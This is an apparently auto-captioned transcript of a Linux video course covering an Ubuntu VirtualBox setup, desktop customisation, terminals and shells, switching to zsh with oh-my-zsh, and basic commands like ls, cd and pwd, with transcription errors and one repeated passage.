what it is right now and then  next then we need to specify the base memory in   here as well as the CPU so for CPU let’s just  choose two cores in here and for memory if you   have more memory on your machine just feel free  to rank this up to maybe four gigs but for me I’m   going to leave as default next and then here it  says either to create a virtual hard disk or use   an existing or do not so in my case I’m going to  basically have 20 gigs so here I’m really saving   memory uh I don’t think there’s much space on  this Windows machine so 20 gigs I think should   be fine and uh yeah create a virtual hard disk  say next and now we have a summary you can read   through it and let’s finish cool so this is pretty  much it now you can see that it says powering VM up so just wait for a second until this is up  and running and you can see that I think it’s   done right so you can see that it’s actually  running now obviously if I click click on it and then we have this window and you can see  that it’s loading yuntu and it says mouse mouse   integration so click on here and then there as  well all right so just give her a second or so   and uh this should install successfully and there  we go you can see that this was really quick and   and here you can see that it’s installing few  things so this is now installing and basically   I’m going to leave this complete and then I’ll  come back to it so that we can proceed our setup   cool now it’s installing the system and I can  click on this button and you can see what it’s   doing on the terminal so let’s just wait until  this finishes and this should take a while for   you so for me I’m going to speed up this video but  uh you should yuntu up and running in a second and   in fact we could actually skip this all together  but I’m going to leave it finish and after a long   time of waiting it seems that it’s almost there  let’s just wait and finally we are done cool so   if you get to this point where you have your  user and then you can click on it and then in   here the password was change and then me right  so I didn’t change the password let me just show   you so change me if I press enter we should be  able to log in if the password is correct there   we go cool this is pretty much it I’m going to  leave it here and we’ll continue on the next video okie dokie so we are almost done  with the configuration so one thing that   I want to do is let’s just click on  Virtual box in here and uh click on settings and then let’s go to Advanced so under  General click on Advanced and then share clipboard   so we’re going to basically say bir directional  and the same for drag and drop so basically we   can basically drag stuff from our Windows to our  yuntu desktop and uh the same with the clipboard   say okay or actually let’s just go to system  and see whether we have to change something so   I don’t think we have to change anything else  and uh under storage so in here so just make   sure that this is empty so make sure that this  is empty that it doesn’t contain the iso image   in here cool audio everything should be fine if  you want to enable AUD the input feel free to   do so serial ports nothing USB shared folders and  user interface we’re going to leave everything as   is okay and in here I can just close this and uh  if I try to put this full screen in here you can   see what happens so to do this what we have to  do is install virtual box guest editions so in   here we’re not going to connect to any online  accounts let me just Skip and also I’m going   to skip the pro yuntu pro next and uh also if  you want to send data feel free but I’m not   going to send any data click on next and uh I’m  going to turn off location and there you go you   you see that it says you’re ready to go you can  use software to install apps like these so press   done and what I want to do is let’s open up the  T terminal so click on this button in here that   shows all applications and then open the terminal  so this is the terminal and with the terminal open   let me just put this full screen like that and  now what we’re going to do is type some commands   and at this point in here I don’t expect you to  know none of this because we’re going to learn   in detail how all of this works cool so the first  thing that that we want to do is is if you type   with me so P sudo and then here we’re going to say  a PT and then up and then date so if this command   in here does not work and now it’s asking me for  the password so change and then me now I’m typing   but you don’t see that I’m typing because this is  done by default because here I’m typing sensitive   information which is the password press enter  and and if it says that Amigo’s code is not in   sudo’s file this incident will be reported that’s  fine so all we have to do is so if this happens   to you type pseudo or actually sorry my bad Su and  then Dash and then here type the password again so   change and then me and or whatever password that  you added and there we go now we can type pseudo   and then add and then user so user and make sure  that add user is all together and then type Amigos   so the user in question so this is Amigos code for  me and then we want to add Amigos code to PSE sudo   just like that press enter and you can see that  this is basically added Amigos code to PSE sudo   and now it means that if I say Su and then Amigos  and then code and by the way Su just allows it to   change users and you will also learn about this  command press enter and now you can see that I’m   back to Amigos code in here and if we type PSE  sudo and then basically the the previous command   I’m just going to press the up aror this one so  P sudo AP and then update and then let’s add the   password once more so change me enter you can see  see that this time this command works so I’m going   to leave these commands that I’ve just did under  description of this video so that you can follow   along as well cool the next command that we need  to run is PSE sudo in here and then AP install   Dash and then Y and then build Dash and then  essential space and then Linux Dash and then   headers Dash and then add dollar sign and then  parenthesis and then you name space Dash and then   R and then close parentheses just like that cool  also you’ll find this command under description   of this video press enter and just give you a  second or so and there we go now navigate to   devices and then insert guest editions CD image  and you can see that we have this dis in here so   let’s just click on it and now what we want to do  is let’s take this file in here autorun Dosh and   then drag it to the terminal in here and let’s  see whether this works so if I so right at the   end if I press enter this doesn’t work and that’s  because I need to remove the quotes there we go so   the quote at the beginning and also the one at  the end and then press enter and it looks like   it doesn’t work so let’s just click on the dis  again and then here I’m going to right click and   then opening terminal so we have a new terminal  let me close the old one so close this terminal   and then we can close this as well and now if  I put this full screen all I want you to do is   to type dot slash and then autorun Dosh press  enter and now it’s asking me for the password   for Amigo’s code and the password was change me so  change me let me show you change me authenticate and it’s installing some modules now we have to  wait until this is complete and the last step   will be to restart our machine and uh it says  press return to close the window it seems to   be done so I’m just pressing return there we go  finished and now let’s together so in here click   on the battery icon and then let’s click on power  off restart restart and now if I restore down so   let’s just restore and and um what I want to do  is I want to put it full screen so if I maximize   now now you saw that the screen went black and uh  what we have to do is so let’s just basically make   this smaller open up virtual box and basically on  this Ubuntu which is running click on settings and   display and what we want to do is to change the  video memory now this is grade out because what   we need to do first is right click on the VM  itself and we want to stop it so stop and then   power off cool let’s switch it off now we can go  to settings and then display and now you can see   that we can change this now I’m going to put this  at 64 somewhere in the middle okay and if we click   on it so you can click here or you can start  if you want through this button just give you a second and very soon we should have so  let me just close this we don’t need this so it should start very soon there we go and  if we try to put this full screen on actually did   that for me but what I want to do is actually put  everything full screen you can see that this time   it works there we go and then if I click on Amigos  code the password was change me enter and we are   inside cool so now what we can do is go to view  and then you can say full screen mode and you   can switch in here and you can see that now all of  this is in full screen mode and we done it awesome   we successfully installed yuntu and if you want to  exit full screen you can see here I could just go   down View and then you have the keyboard shortcuts  as well but if I press on it you can see that I   came out from this and I do have access two in  here my Windows machine cool this is pretty much   it and also if you get software updata just  go and install as always but in my case I’m   going to be naughty and I want to say remind me  later this is pretty much it catch me on the next one cool in this video what I want to walk  you through is how we going to customize our   desktop so in here let’s together just put this  full screen and I’m going to switch there we go   and if you want to customize the look and feel  of yuntu desktop go to show applications at the   bottom and then click on settings cool now that we  have settings in here we are able to change couple   of things so you can change the network specific  information Bluetooths in here background so you   can choose for example if you don’t like this  background just choose this one for example you   can see that it changes but for my case I’m going  to stick with the default in here appearance so   appearance you can change the color theme in  here so maybe you like this color in here so   if I click on it you can see that the icons have  changed have a look right but I’m going to leave   the default in here so everything is consistent  throughout and you can change the icon size if   you want as well so I think the icon size I  think we have one icon in here so the oh icon   so if I increment this no it’s yeah the icon  size is basically this one right here on the   left right so I’m going to leave that as 64 you  can change this according to whatever you prefer   so for me it’s more about making sure that you  see everything visible in here notifications so   there’s nothing here search multitasking so you  can basically configure this uh I’m not going   to touch none of these applications so there’s  no configuration on any of these applications   in here let me just go back privacy same nothing  I’m going to change here and um online accounts   you can connect your Google account Microsoft and  whatnot sharing so there’s nothing here you can   change the the computer name if you want sound as  well power so basically you can have power saver   or not screen blank after whatever minutes screen  display and in here let’s basically scale this so   let’s say that we want 200 so apply and you can  see that things are now so big so I’m going to   keep these changes 200 and um let’s have a look  if I put this full screen what what do I get yeah   this looks nice right so 200 and then let me go  to I think it was background or sorry appearance   and then the icon size we can make a little bit  smaller now just like this you can leave it like   that uh but as as I said you could basically do  whatever you want okay so screen display and again   you can make this 100% I’m just making things  big so you can see sharply and then Mouse and   touchpad you can change the speed if you want the  keyboard so my one is so so let me just add United   Kingdom so this is my one English UK and add and  then delete this guy so remove there we go and   um printers nothing there removable media nothing  and device color profiles and obviously here I can   scroll down and you can see a bunch more right so  language region so here you can change the region   the language accessibility date and time so on and  so forth all right so also the same with users so   here we only have one user and uh you can change  the password if I’m not mistaken in here right   cool so my password is changed me I could change  for uh something better but I’ll show you how to   do all of this through the terminal which is uh  what we are here to learn how to use Linux andd   terminal let me cancel and then close this so  let’s just get rid of this from favorites I’m   going to get rid of this as well office as well  ubun to sofware as well help as well I want to C   I want to keep it clean eject there and I think  this is it awesome this is pretty much it if you   have any questions drop me a message but from now  on if you you followed the Mac installation this   is the exact same point and vice versa so from  now on both Mac and windows uses everything should   be the same because we are using Ubuntu desktop  this is pretty much it I’ll see you on the next one okayy doie so with Linux it’s all about the  terminal and really the reason why I installed the   desktop is so that you basically get an operating  system but what we’re going to focus throughout   this course is on the terminal so Linux it’s all  about the terminal and as you’ll see later when   we SS into a remote server we never have the  graphical user interface so it’s all about the   terminal cool so what is a terminal really  right so terminal also known as the command   line interface or CLI so in here if I go to show  applications and we have terminal so let’s just   take terminal and I think if we put it there  does it takes it from here so hold on so let   me just put it back in here right click add to  favorites oh yes it doesn’t really matter cool   so the terminal now it’s within the favorites and  now I can just click on it and open cool so what   is this terminal in here right so we have Amigos  code and then add Amigos code so the terminal   is a text based interface that allows you to  interact with a computer operating system by   entering commands so in here let me just type  one command and you’ll see how it works so if   I say date for example press enter so this  is giving me the current date so this was   a command and we’ll let learn more about this  um commands and what not in a second but this   is a command which allows me to interact with the  operating system so similarly if I want to create   a folder in here on my desktop I’m going to type  mkd and then here just type Tilda for a second so   tilder for SL desktop and then say for Slash and  here I’m going to say f for example press enter   and now have a look there’s a new folder that  was created for us full right so the terminal   allows us to interact with the computer operating  system by entering commands it provides a way to   execute commands navigate the file system manage  applications without the need of the graphical   user interface so to be honest we don’t even need  this UI right so usually you would right click   and then uh move to trash for example so this so  This basically deletes the file so this is with   the graphical user interface but in reality we  don’t need this right so here if I just say for   example RM and we’ll go through these commands in  a second so RM and then tiller for Slash and then   desktop and then F and actually so here I need  to say RM dasr and then F so you learn this in   a second if I press enter you can see that now  the folder has disappeared okay so this is the   terminal so the terminal allows us to interact  with the operating system the time not provides   a prompt so this is the prompt where we can  enter the commands and receive the output so   when we say date we get an output right so some  commands we don’t get an output but I’ll show   you um other other things that we can do right so  with this we can per perform a wide range of tasks   such as navigating directories creating modifying  files running programs accessing system resources   and whatnot so the terminal is commonly used by  developers and systems administrators to perform   a bunch of tasks including software development  server Administration and Automation and this is   a very powerful and efficient way to work with a  computer operating system and it’s an essential   tool for everyone working with programming and  development so knowing how to use the terminal   it’s a must for you right so this is the reason  why I’ve got this course for you because you   should be doing pretty much everything through  your terminal okay I don’t want to see you know   if I want to create a folder right click on your  uh graphical user interface new folder and then   say the folder name blah blah blah so this is  bad Okay so by the end of this course you oh   you see I’m actually deleting the folder using  uh the UI this is wrong but let me just do it   there we go but at the end of this course you  will familiarize yourself quite a lot with the   terminal so that you have all the required skills  in order to use the terminal and as you’ll see   a bunch of tools such as git Docker kubernetes  all of them you actually have to interact with   them through the CLI or The Terminal cool  this is pretty much it catch me on the next one within my Mac OS what I want to show you is  that I also have a terminal available within Mac   OS so here if I search for terminal so this right  here is the default terminal that comes with Mac   OS so here I can type any command and basically  this will be executed against my operating system   so if I say for example LS in here and you’re  going to learn about LS later but just type   this command press enter and in here this is just  listing all the contents that I have within home   right here so if I type clear for example so  this is another command so this actually clears   the terminal and here I can type for example  PWD in here you’ve seen this one so this is   users and then Amigos code so similarly there’s  also another ter available and this is not part   of the Mac OS operating system but it’s the one  that I use actually on my machine and that is   the iter so in here this is item so yet another  terminal this is way fancier than the other one   you can see the look is actually all black and  it has lots of customizations for example if I   want to split the screen into two for example  I could just do it like that and maybe three   times right here you can see that I’ve got one  two three and in this I can type LS in here I   can type PWD and in here I can type for example  Cal for example and you can see that basically   I’m executing commands in three different shells  and I’m going to talk about shells in a second   but basically you can see that this terminal  right here is way more powerful than the default   that comes with Mac OS so here let me just close  this and yeah so I just wanted to show different   terminals available for Windows what you have  is the command line or simply CMD and it kind   of looks like this and probably you’ve seen  this if you’re on Windows and again this is a   terminal so you can run commands and those will be  executed against your operating system and perform   whatever tasks that you tell it to do and this is  pretty much for this video catch me on the next one also what I’m going to show you is within  text editors and idees there will always be an   integrated terminal so you don’t necessarily  have have to use a terminal that ships with   your operating system or you don’t have to  install a ter for example so here I’ve got   VSS code so visual studio code open and within  Visual Studio code if I click on Terminal and   then here new terminal and in here you see  that I do have the terminal so here I can   type the exact same commands that you saw  so for example if we type who and then am   and then I so just type this command here if you  have Visual Studio code or any other text editor   so in here let me just type who and then um I so  don’t you worry about this uh we’ll cover all of   these commands but for now I’m just showing you  other the terminals so if I press enter you can   see that this gives me a MH code also so I think  so this is one is quite cool so within terminal   I can split the terminal in here so have a look  so the same way that you saw with item which is   quite nice right and here you actually have two  different shells so this is zsh and we’ll cover   uh shells in a second but here I can delete this  delete this as well and it’s gone also one of my   favorite ID is intellig so in here intell has an  integrated terminal if I open this you can see   that we have the terminal in here and I can type  again the same command so who am I press enter   and you can see that this basically gives you the  exact same output awesome so this is pretty much   about terminals if you have any questions drop  me a message otherwise catch me on the next one all right so you know what the terminal is now  let’s focus on understanding exactly what the   shell because often people use these two words  so terminal and shell they’re kind of the same   thing and if you do it that’s fine but it’s  very important that you understand what is   the actual difference between terminal and  shell and that’s what we’re going to focus   in this section and also you’ll see how we’re  going to switch from bash to zsh and you also   see different shells available for the Linux  environment so without further Ado let’s kick off in this section let’s focus on understanding  what the shell is and basically we’ll also   customize the default shell that we have to a  better one but inet shell a shell is a program   for interacting with the operating system right  so you’ve seen that uh we have the terminal in   here and the terminal is just an application  that allows users to input commands to the   shell and receive text based outputs from the  shell operations right now the shell is was   actually taking the commands themselves and then  executing those against the operating system let   me give you a quick demo so in here let me  just open the terminal and the terminal in   here is responsible for taking the inputs right  so the terminal basically allows you to create   uh multiple tabs allows you to expand uh allows  you to here new tab so this is a terminal right   but now whenever I type a command so if I type  for example touch and this is the command that   you’ve seen before so on the slide so touch  and here I’m want to say desktop and then   full bar.txt so if I press enter and don’t worry  too much about this command so you learn how this   works but basically this command in here right  so I’m passing this command through the terminal   so the terminal is responsible for taking the  commands and also outputting the results from   commands executed by the shell so the shell now  is responsible to interact against the operating   system so if I press enter you can see that  we have the file in here full bar.txt right   so the same if I say RM and basically the same  Command right so here let me just go back and   if I say RM right press enter you can see that  the file is gone and again don’t worry too much   about this you learn all of these commands  later but this is pretty much the concept of   terminal and shells now I’ve said shells because  there’s a bunch of different shells that you can   use with Linux you have bash in here so bash for  Born Again shell this is one of the most widely   used shells in the default and is a default  on many Linux distributions we have zsh so   this is the one that we’re going to to switch  to in a second and this is highly customizable   and offers Advanced features like autoc completion  spelling correction and a powerful plug-in system   and then you have fish and many others cool this  is pretty much the gist of shells next let’s go   ahead and understand and customize and change  and basically learn what you need to know about shells cool so you know that the shell is basically  what takes the commands and then basically   execute them and executes them and the terminal  is just the graphical user interface in here so   you saw item you saw the terminal for Mac OS  command line for Windows and the the shell   itself is basically the command line interpreter  right shell or command line interpreter they are   both the exact same thing so what I want to show  you here is how do you view the available shells   that you have installed but also how are we able  to change the current shell so let’s together   type in here so basically if you have Tilda and  then desktop in here or if you don’t have this I   think we did run the CD command before but what  I want to do is so that you have the exact same   screen as mine just type CD yeah so so you’ll  have something like the server name plus the   user in here so my one is just Amigos code at  Amigos code cool at this point let’s together   type we’re going to say cat so you’re going to  learn about the cat command later but here say   for SL and remember tab so I’m going to press  tab have a look so if I go back e and press tab   have a look I just get Auto competetion okay now  type SE e now type shells so sh and then tab so   if I tap tab again you see that we do have Shadow  Shadow Dash and then shells so shells like that   and and in here let me just contrl L and then run  this command all right cool so now have a look so   these are the available shells that we can use  so I think these are the defaults that come with   yonto so if I take this exact same command so CD  so cat Etsy and then shells and run it on my Mac   OS so here the same command but it just looks  a little bit different but it’s going to be the   exact same thing press enter and have a look so we  have bash we have chh Dash KS sh T C CH and then   zsh so I’m going to show you how to use this one  later but if you want to know the current shell   so the current shell that you are using so here  we could just type this command so I’m going to   basically say Echo and then dollar sign and then  shell so basically all caps and um we’ll go over   the echo command as well as dollar sign in here  but for now this is the command I need to run and   it will tell you the current shell that you are  using so in my case I’m using zsh if we take this   exact same command and running within Ubunto so  here Echo and then dollar sign and then shell run   it you can see that the default shell for yuntu  is Bash cool next let’s go ahead and install zsh zsh also called the zshell is an extended  version of Bor shell with plenty of new features   and support for plugins and themes and since  it’s based of the same shell as bash Zs has   many of the same features and switching over it  it’s a Nob brainer so in here you can see that   they say many original features were added  so let’s together in install zsh and as you   saw the default shell for Mac OS now is zsh or  zshell so let’s actually install this as well   in our Ubuntu desktop so in here you saw the  list of available shells so you saw that we   have bash in here which is a default right so  bin and then bash and when you run Echo shell   bin bash is a default so we want to change  this to zsh because it’s an improvement on   top of bash so here what we need to do first is  contrl L to clear the screen and to install zsh   we say pseudo and then AP and then space install  Zs so we’ll come back to AP or apt and this is the   pack manager basically that allows us to install  software okay so here let’s just press enter and   we need to enter the password for Amigo’s code  and in fact your password so here I’m going to   type and you might think that I’m not typing  anything but I’m actually typing so this input   right here doesn’t show the password for security  reasons so press enter and you can see that now   it went off and it’s installing and it’s just  waiting for us to confirm so in here just say Y and just wait for a second you can see that  we have the progress and boom so this is done   now to make sure that this was installed  correctly just type zsh and then Dash Dash   and then version press enter if you have  this output in here it means that you have   installed zsh so if I clear the screen control  l in here and then press the up Arrow a couple   of times and if we list the available shells  under ET C cat now you should see that we have   user bin and then sh right as well as bin dsh  and we’ll cover the difference between bin and   u or actually user or USR later on when  we discuss the Linux file structure cool   this point we just installed zsh but what  about using zsh let’s continue on the next video oky dokie now for us to use zsh what we need  to do is just simply type on the terminal Z red   s and then H press enter and now you can see that  the output is a little bit different and basically   instead of having this colid Amigos code at Amigos  code we just have Amigos code which is just a user   okay and at this point nothing else changes  because as I said zsh is built on top of bash   so all the commands that we execute for example in  here you saw that we run this this command before   LS so this command if I press enter this will work  so the output right here is not call it as before   but I’ll show you what we need to install later  so that we can improve the experience when using   zsh and to be honest this is it now if you want to  switch back to bash just type bash in here and now   we are back to bash and in fact let’s just press Z  SSH once more more and now if I search so here I’m   going to say dollar and then s basically and oh  actually sorry this will not even work because now   we are within a different shell so I was trying  to search for Echo and then shell so let’s just   type and not be lazy so Echo and then dollar sign  and then shell and I was expecting to say zsh but   the reason why is because zsh currently is not  the default one which means that if I open a new   tab in here and you can see that if I make this  smaller actually bigger and here I can type Echo   and then dollar sign and then shell just like that  and you can see that this is Bash in here cool so   let me just close this and you’ve just seen that  if you want to go back to bash you just say bash   in here right but also if I say cat for slash  etc for Slash and then shells press enter we   have all the shells so we have dash sh so let’s  just type sh for example in here so now we’re   going to switch from bash to sh boom you can see  that now this is sh so this is yet another shell   if I want to use for example dash dash this is  a another shell R bash R and then bash there we   go bash and zsh and this is pretty much how you  switch between shells but really what I want to   do is switch my defa shell to zsh and the way to  do it is by using this command in here so CH h s   and then Dash and then s and what we’re going  to do is point to the Shell itself so this one   user bin zsh so say for slash USR not user my bad  USR for slash bin SL Zs press enter let’s add the   password cool now if I show you something if I  open a new shell so contrl shift T have a look   this still Bash and I know because if I typee Echo  so let’s just type Echo and then dollar sign and   then shell and if I put this smaller press enter  you can see that it still says b bash so let me   just come out of this controll and then D and  now let’s just reboot so re and then boot press enter now let me loog in enter and if I open the terminal you can see that the first thing  that we are prompted with is to configure   zsh so in here let me just press control and  then minus so you see everything in here there   we go and you can see that this is the zshell  configuration function for new users you are   seeing this message because you have no zsh  startup files so basically this is the files   that it needs for configuring zsh and it says  you can quit or do nothing exit create in the   file continue to the main menu or populate your  zsh with the configuration recommended so this   is exactly what we’re going to do okay so type  one of the keys in parenthesis so we want two   and there we go so basically this has now created  a file called zshrc and U I’ll show you this in   a second right so from this point onwards we  have successfully installed zsh and now it’s   a default shell so if I clear the screen control  and then Z zero to increase the font and now if I   open a new shell control shift T have a look so  this is no longer bash so here let’s just type   Echo and then dollar sign shell press enter  have a look zsh in our previous one as well   and then type the same command Echo Dash and  then shell and you can see that now now it’s   zsh awesome we have successfully switched  to zsh and we have a better shell from now on cool now let’s switch our default shell  to zsh and the way to do it is by using this   command in here so CH H sh and then Dash and  then s and what we’re going to do is point   to the Shell itself so this one user bin zsh  so say for slash USR not user my bad USR for   slash bin for slash zsh press enter let’s add  the password cool now if I show you something   if I open a new shell so control shift T have  a look this still bash and I know because if   I type Echo so let’s just type Echo and  then dollar sign and then shell and if I   put this smaller press enter you can see  that it still says b bash so let me just   come out of this controll and then D and now  let’s just reboot so re and then boot press enter now let me loog in enter and if I open the terminal you can see that the first thing  that we are prompted with is to configure   zsh so in here let me just press control and  then minus so you see everything in here there   we go and you can see that this is the zshell  configuration function for new users you are   seeing this message because you have no zsh  startup files so basically this is the files   that it needs for configuring zsh and it says  you can quit or do nothing exit creating the   file continue to the main menu or populate your  Zs AG with the configuration recommended so this   is exactly what we’re going to do okay so type  one of the keys in parenthesis so we want two   and there we go so basically this has now created  a file called zshrc and um I’ll show you this in   a second right so from this point onwards we  have successfully installed zsh and now it’s   the default shell so if I clear the screen  control and then zero to increase the font   and now if I open a new shell control shift T  have a look so this is no longer bash so here   let’s just type Echo and then dollar sign shell  press enter have a look zsh in our previous one   as well and then type the same command Echo Dash  and then shell and you can see that now now it’s   zsh awesome we have successfully switched  to zsh and we have a better shell from now on the last thing that I want to do in this  section is to unleash the terminal like never   before with oh my zsh which is a delightful  open- Source Community Driven framework for   managing your zsh configuration it comes bundled  with thousands of helpful function helpers plugins   themes and basically you’ve got all the batteries  included and you can see here on the left you can   customize your theme and make it so powerful and  beautiful and uh yeah just a bunch of things that   will make you look like a professional so if I  scroll down you can read more about it in here   and they’ve got many plugins and you can see  that on GitHub so this is where this is hosted   and in fact if I click on this link in here so  let’s just give you a star I think I have done   it before but if not this is the right time  because it’s awesome so here we can see all   the staggers and let’s give it a star in here so  if you don’t have GitHub don’t worry so there we   go one more star and let’s click on this repo  in here or you can actually click on the code   Tab and here if I scroll down you can see some  description of what it is how to get started the   installation process in here have a look at this  method sh so this is a shell remember you saw sh   and you just pass this command with curl we’ll  look into curl as well and if I scroll down you   can see they talk about how to configure so this  is is zshrc so this is where the configuration   file is and also plugins g.m Mac OS and basically  you can install a bunch of plugins and also themes   they have a section on themes so you can choose a  theme and here I’ll show you this in a second how   to configure zshrc and um it might look like this  if you choose for example I think it’s this theme   in here but you can do a lot with this and also  you can choose a random theme for example which   is nice awesome so let’s install oh my zsh and  I can actually go back to the previous website   and in here they have a section on install oh  mysh now so what we’re going to do is let’s just   take this command and I’m going to copy this go  to yuntu desktop and here I’m logged out let me   just add the password there we go and just paste  the command so control shift and then V and let   me just put this smaller so you see what this  looks like whoops there we go you can see the   entire command in one line if I press enter  so have a look it’s doing few things so it’s   just cloning oh my that issh and basically it’s  just running some script and tada this is now   installed so oh my Zs is now installed before  you scream oh my Zs I actually screamed look   over the zshrc file to select plugins themes and  options also if you look closely so if I press   control 0 in here the so in here have a look so  so now the prompt has changed so you have this   arrow in here and you have Tia so Tia basically  means that you are in the home folder and we’ll   talk about home later but to be honest this is  pretty much it nice if I open up a new tab you   can see that this is already configured and zsh  is installed next let’s look how to configure zsh cool you saw that they said before you scream  oh my zsh look over the zshrc file to select   plugins and themes and other options so in order  for us to achieve this what we have to do is the   following I’m going to clear my screen crl L and  make sure to type CD just to make sure that we   are within the same folder so just type CD there  we go and what this does basically is if I say   for example CD and then desktop press enter so for  example maybe you are inside of a different folder   desktop so if you type CD it just takes you to the  home folder in here and again we’ll come back to   all of this commands in a second so type CD if I  claim my screen contrl l type VI space do zsh R   and then C you can just type tab so here if I type  zsh or Dot zsh and then tab have a look we’ve got   zsh history zsh RC and rc. pm. preo my zsh so  the one I want is our C right and if I click   the screen and then press enter and there we go  so this is the configuration for zsh and here if   we scroll down so just scroll down in here and  you can see that a few things are commented out   and scroll down in here you can see that we have  some stuff plugins so at the moment there’s only   one plug-in which is get but I’ll leave this up  to you to configure this the way you want it you   can explore themes and whatnot and also you can  configure alyses and a bunch of other things but   basically this is pretty much it if I go back to  the giab repository so here remember if I scroll   down I think they have a section on themes have a  look selecting a theme so once you find the theme   that you like you’ll see an environment variable  all caps looking like this right and to use a   different theme just change to agnos for example  so let’s try this and actually I think the themes   are available so I think there’s a link right  so yes in case you did not find a suitable theme   please have a look at the wiki so here if I click  on this link it takes me to external themes and   have a look so this one looks actually quite good  oh even this one wow so you can see that there’s   a oh you can see that there’s oh I’m getting  excited here you can see that there’s a bunch of   themes that you can use and basically just follow  the instructions in here on how to install them   but let’s just go back to the terminal and what  we’re going to do is so here if I scroll all the   way up to the top in here and have a look the zsh  theme is Robbie Russell so what I want to do is   the following so here we need to be really careful  and just follow exactly as I say because this is   VI and we will learn about this text editor so  here type J just type J and make sure that you   select the terminal type J and you can see that  the cursor is moving down so stop right here and   what I want to do is to type on your keyboard  the letter Y twice so y y and followed by the   letter P there we go so this basically duplicates  the line for us now I want you to type the letter   I and you can see that now it says insert and this  means that we can basically type on the text edit   editor itself so I want you to use the app arror  and we’re going to comment this line so here let’s   just comment this with the pound sign and then go  down and here I’m just using the arrow but I’ll   show you a better way later so let’s just remove  so delete anything within double quotes and let’s   use the AG Noster EG Noster and now I want you to  type the scape key on your keyboard and you can   see that insert is no longer here and then type  colon so colon in here W and then Q so write and   quit so this allows us to come out of this editor  in here press enter and that’s it awesome now   what we going to do is open a new tab you can see  that the theme looks slightly different and here   is actually missing some fonts which we have to  install but I’m going to leave this up to you in   terms of how you’re going to customize your IDE so  I’m not spending time on this okay so usually my   one is just black so here let me just close this  and let me go back to VI so I’m going to press the   app eror so here crl L and you can see the command  once more enter and what we’re going to do is the   following so here I’m going to press D and then D  so twice and make sure that the cursor is in this   line so DD twice so that is gone so basically that  deletes the line I’m going to press I for insert   and let’s just get rid of that and esape colon WQ  esape colon WQ I’ll leave instructions on how to   work with Vim but I’ll teach you Vim later on so  here press enter and now if I open a new tab you   can see that we have the default theme cool so  here control 0 to have the default font size crl   L and this is pretty much it I’ll leave some  links under the description of this video so   you can go and explore and Adventure yourself on  how to customize your ID e but if I show you my   one quickly on Mac OS it just looks like this so  it’s plain black and there’s no themes whatsoever   so let me just say uh in here VI and then zsh  zshrc so this is the exact same configuration if   I put this full screen in here have a look so the  exact same thing I didn’t change nothing and you   can add plugins and whatnot so I’ll leave this  up to you cool so here Escape W colon and then   Q this time I didn’t change this file and press  enter this is pretty much it catch me on the next video let us now focus on Linux commands because  moving forward we’re going to learn a bunch of   commands which essentially is what Linux is all  about right so it’s about learning a bunch of   commands that allows us to interact with the  operating system so a Linux command is a text   instruction that tells the operating system  what to do these commands can be entered in   the terminal or command Lin or basically CLI and  by now you should be familiar with the terminal   and um we basically pass those commands and then  an instruction is sent to the operating system   maybe you want to create a file you want to delete  a file you want to check the time or you want to   connect to a remote server so there’s a bunch  of commands that allows us to interact with the   underline operating system the Linux command  the commands themselves are case sensitive so   for example LS and LS in capital these are  two different commands Linux commands are   often various in options and arguments that can  modify their behavior allowing for a wide range   of functionality so in this example in here so  we have the command option and argument so this   is a command so LS is the command then we can  pass an optional argument so this is Dash and   then a and then an argument so here we are saying  dot which means the current directory so here are   some basic commands LS for listing files CD for  changing directories make di for creating a new   directory RM for removing files CP for copying  files and many more each of these commands they   have an instruction via the manual so if you  don’t know how to use a command you can see   the instructions or some guide on how to use  it effectively let’s go ahead and learn about commands in here I do have the terminal open and I  want to give you a quick introduction of commands   so throughout this course you actually seen some  of the commands that I’ve been using for example   LS so you saw that I did the type LS couple of  times on the terminal you also seen M KD iir or   make there you also seen I think it was sleep  so all of these are commands that allows us to   interact with the underlying operating system  so let me quickly just show you the ls command   and then we’ll go over the command itself the  options and the arguments and also on to show   you the list of all available commands as well  as alyses and the manual so the man page so in   here if I type LS you can see that this is a  command and literally just type LS anywhere   so if you are within a different folder or maybe  let’s just make sure that we are within the same   folder together so here type CD so CD this is a  command so press CD and and this will take you to   the home folder okay now we type CD so CD stands  for change directory so this is one command now   change directory means that you change in the  directory where the subsequent commands will be   run from so let’s just type LS so basically the  ls command will be run under this home folder   in here and come back to the tilder and home  folder as well so press enter and you can see   that we have desktop music templates documents  pictures videos downloads and public so these   right here these are folders currently okay but  I know that within this folder so in here if we   type PWD so this is another command and we’ll  come back to this in a second but this stands   for present working directory press enter and it  tells you that I’m under for slome for/ Amigos   code so this is the folder that I’m currently in  so we just typed LS under this folder and we have   these contents in here right now I know for a  fact that there are more stuff under the home   folder okay so this is home okay so home meaning  that if I say Echo so this is another command so   Echo and Echo takes an argument right so here  I want to pass the argument as the home so this   is actually an invironment variable and we’ll  cover environment variables later but this is   the command Echo and this is the argument in  our case for PWD we just executed the command   without no arguments nor options the same with  ls the same with CD so here if I press enter so   this will give me the home location which is  basically for slome and then the user itself   in here cool so LS in here so let me just clear  the screen so contrl L and here if I typ LS you   can see that we have desktop music templates blah  blah blah right now I know for a fact that there’s   more content inside of the home folder so here  let’s type LS and then we’re going to say Dash   and then a so a in here so this is an option  this is an option if I press enter now have   a look so what we have we have more stuff so if  I scroll up in here so we basically typed ls- a   and have a look so these are all the files bash  history we have the cache we have config then   we see so oops let me scroll down here so then we  see the desktop documents downloads as before but   here we are actually including as well as hidden  files so all of these are hidden now what do I   mean by hidden right so if I open files and in  here this is home right have a look under home   I see documents downloads music picture public  templates and videos so this is what I see so in   here let me just put this on this side like so and  then this guy right here and if I put the font a   little bit smaller and then crl L and if I type  LS without the option- a what we see is desktop   music templates so basically everything that you  see in here right but through the terminal if I   say ls- a now we have a bunch of more stuff so in  here what I can do is I can click on these three   lines at the top click on it and here show hidden  files click on it now can you see bash history profile Vim info zshrc so remember this file in  here so these are hidden files right so you saw   that by default it doesn’t come up in here but we  can toggle the hidden files so here this is the   Das a so – a means hidden files now before we move  on to the next video so one thing that I want to   show you also so LS in in here we could say LS and  then so let me just go back here say LS and then   dot so dot means the current directory and this is  actually optional with the ls command because we   are so here if I type again PWD present working  directory we are within Amigos code this folder   this is the home folder which is this one that you  see right so if I time LS and then dot this is the   exact same thing as LS okay so contrl C there let  me just type LS and then Dot and you can see that   is the exact same thing so what we’ve done before  was LS and then Dash and then a and then dot okay   so this is the command itself so LS the option and  this is the argument so here if I press enter you   can see that we get the exact same output now you  might be saying right so here the ls so if I press   the up error so ls- a and then dot so here this  is the argument well we are printing or well we   are listing the contents of the present working  directory which is home but let’s say that within   documents so let’s just go to documents in here  so documents and let’s just right click in here   new folder I’m going to say f in here okay press  enter let’s 